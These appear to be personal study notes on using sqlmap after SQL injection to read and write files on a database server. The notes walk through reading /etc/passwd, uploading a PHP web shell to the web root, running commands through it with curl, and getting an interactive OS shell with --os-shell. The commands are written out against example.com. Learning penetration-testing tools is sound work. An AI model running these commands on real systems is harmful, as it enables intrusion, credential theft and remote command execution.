OS Exploitation

sqlmap uses sqli to read and write files from the local system outside the DBMS.
SQLMap can also give us direct command execution on the remote host if we have the proper privileges.

Read/Write

to read local files, DB User must have the privilege to LOAD DATA and INSERT, to load content of a file to a table and then read that table.
eg: LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE passwd;
While we do not necessarily need to have database administrator privileges (DBA) to read data, this is becoming more common in modern DBMSes. The same applies to other common databases. Still, if we do have DBA privileges, then it is much more probable that we have file-read privileges.

sqlmap -u "URL" --is-dba
- current user is DBA: False
- this case, the file wont be retrieved.

sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
- output saved to the .sqlmap folder
- cat ~/.sqlmap/output/www.example.com/files/_etc_passwd

Write the php shell to a file.
Write this file to a directory on the remote machine running sql
- sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
- Confirm that the file is uploaded
  - [INFO] the local file 'shell.php' and the remote file '/var/www/html/shell.php' have the same size (31 B)
Access the remote PHP shell and execute a command:
- curl http://www.example.com/shell.php?cmd=ls+-la

Since we know that we can manually write a shell to gain Command Execution.
We can test sqlmap to give us an easy OS shell without us writing a remote shell.
it will try to: write a remote shell (like above); use sql functions that execute commands, or use xp_cmdshell.

sqlmap -u "http://www.example.com/?id=1" --os-shell
it will present an input and then perform the query.
if union injection isnt working, we can try Error based as it will have a chance to display the message
sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E